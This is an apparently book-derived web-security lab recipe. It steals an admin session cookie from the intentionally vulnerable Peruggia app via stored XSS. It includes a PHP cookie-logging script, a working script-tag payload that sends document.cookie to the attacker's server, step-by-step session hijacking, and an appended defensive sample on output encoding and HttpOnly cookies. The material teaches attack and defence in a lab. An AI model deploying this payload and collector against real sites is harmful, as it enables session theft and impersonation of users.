We have already discussed Cross-Site Scripting (XSS); it is one of the most common web attacks today. XSS can be used to trick users into providing credentials by simulating login pages, to gather information by executing client-side commands, or to hijack sessions by obtaining session cookies and impersonating their legitimate owners in the attacker's browser.
In this recipe, we will take advantage of a persistent XSS vulnerability to obtain the session cookie of a user and then use that cookie to hijack the session by implanting it in another browser and executing actions while impersonating the user.
For this recipe, we will set up a web server that will act as our cookie gatherer; so, before we attack, we need to start the Apache server on our Kali machine. Run the following in a terminal as root:
service apache2 start
In the system used for this book, Apache's document root is located at /var/www/html. Create a file called savecookie.php in that directory and put the following code in it:
<?php
// Append each value received in the "cookie" GET parameter to a file, one per line.
$fp = fopen('/tmp/cookie_data.txt', 'a');
if (isset($_GET["cookie"])) {
    fwrite($fp, $_GET["cookie"] . "\n");
}
fclose($fp);
?>
This PHP script gathers all the cookies sent by the XSS attack. To make sure that it works, go to http://127.0.0.1/savecookie.php?cookie=test and then check the contents of /tmp/cookie_data.txt:
cat /tmp/cookie_data.txt
If it shows the word test, everything is fine. The next step is to find out the address of our Kali machine in VirtualBox's host-only network. In a terminal, run:
ifconfig
For this book, the vboxnet0 interface of the Kali machine has the 192.168.56.1 IP address.
1. Browse to http://192.168.56.102/peruggia/ and post a comment containing the following script:
<script> var xmlHttp = new XMLHttpRequest(); xmlHttp.open( "GET", "http://192.168.56.1/savecookie.php?cookie=" + document.cookie, true ); xmlHttp.send( null ); </script>
2. Back in the Kali terminal, check the file again:
cat /tmp/cookie_data.txt
A new entry should appear in the file.
3. In another browser (the victim's), go to http://192.168.56.102/peruggia/ and log in using admin, both as username and password, and click on Login.
4. Check the file once more:
cat /tmp/cookie_data.txt
The last entry was generated by the user in the victim's browser.
5. In the attacker's browser, edit the session cookie, copy the last session ID from /tmp/cookie_data.txt and paste it in the Content field, as shown.
Now we have the admin's session hijacked via a persistent XSS attack.
In short, we used an XSS vulnerability in the application to send the session cookie to a remote server through a JavaScript HTTP request; this server was configured to store the session cookies. Then, we took one session ID and implanted it in a different browser to hijack an authenticated user's session. Next, we will see how each step works.
The PHP file we made in the Getting ready section is the one that saves the received cookies when the XSS attack is executed.
The comment we introduced is a script that uses JavaScript's XMLHttpRequest object to make an HTTP request to our malicious server; that request is made in two steps:
xmlHttp.open( "GET", "http://192.168.56.1/savecookie.php?cookie=" + document.cookie, true );
We open a request using the GET method, adding a parameter called cookie to the http://192.168.56.1/savecookie.php URL; its value is the content of document.cookie, the JavaScript property that holds the cookies of the current page. Finally, the last parameter, set to true, tells the browser that this is an asynchronous request, which means that the script does not have to wait for a response.
xmlHttp.send( null );
This last instruction sends the request to the server.
After the administrator logs in and views a page that includes the comment we posted, the script is executed and the administrator's session cookie is stored in our server.
Finally, once we have the session ID of a valid user, we simply replace our own session cookie with it in the browser and reload the page to perform an operation as if we were that user.
Instead of only saving the session cookies to a file, the malicious server can also use those cookies to send requests to the application impersonating legitimate users, in order to perform operations such as adding or deleting comments, uploading pictures, or creating new users, even administrators.
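The two defences that break this recipe, as an added example that is not from the book: output-encoding the comment before it is placed in the page, so the stored <script> is rendered as text, and marking the session cookie HttpOnly, so document.cookie (which the injected script relies on) cannot read it. The cookie name PHPSESSID and the comment markup are assumptions; the payload is the one posted above.

```javascript
// Constructed sample: the comment payload used in the recipe above.
const PAYLOAD = '<script> var xmlHttp = new XMLHttpRequest(); ' +
  'xmlHttp.open( "GET", "http://192.168.56.1/savecookie.php?cookie=" + document.cookie, true ); ' +
  'xmlHttp.send( null ); </script>';

// Encode the characters that can break out of an HTML text context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Vulnerable rendering (assumed markup): the comment is concatenated as-is,
// which is how a stored comment becomes executable script in the page.
function renderCommentUnsafe(comment) {
  return '<div class="comment">' + comment + '</div>';
}

// Hardened rendering: the same comment is encoded and stays inert text.
function renderCommentSafe(comment) {
  return '<div class="comment">' + escapeHtml(comment) + '</div>';
}

// True if the HTML contains a script element a browser would execute.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Set-Cookie header for the session ID (PHPSESSID assumed) with the flags a
// defender wants: HttpOnly hides it from document.cookie, Secure keeps it off
// plain HTTP, SameSite limits cross-site sending.
function sessionCookieHeader(sessionId) {
  return 'PHPSESSID=' + encodeURIComponent(sessionId) +
    '; Path=/; HttpOnly; Secure; SameSite=Lax';
}

// True if a Set-Cookie header leaves the cookie readable via document.cookie,
// i.e. the HttpOnly attribute is missing.
function readableFromScript(setCookieHeader) {
  const attrs = setCookieHeader.split(';').map((a) => a.trim().toLowerCase());
  return !attrs.includes('httponly');
}
```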